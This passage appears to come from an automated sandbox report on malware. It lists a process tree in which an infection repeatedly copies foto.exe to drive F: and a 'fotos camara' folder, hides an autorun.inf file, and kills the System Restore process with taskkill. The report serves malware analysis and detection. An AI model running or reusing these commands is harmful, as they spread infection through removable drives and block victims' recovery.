- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2480
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2496
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:272
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:436
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1732
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2164
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:3052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2304
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2368
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1168
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:944
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:272
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1688
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1276
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1616
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:824
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2724
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2824
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:1532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2172
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2304
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1168
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\attrib.exe
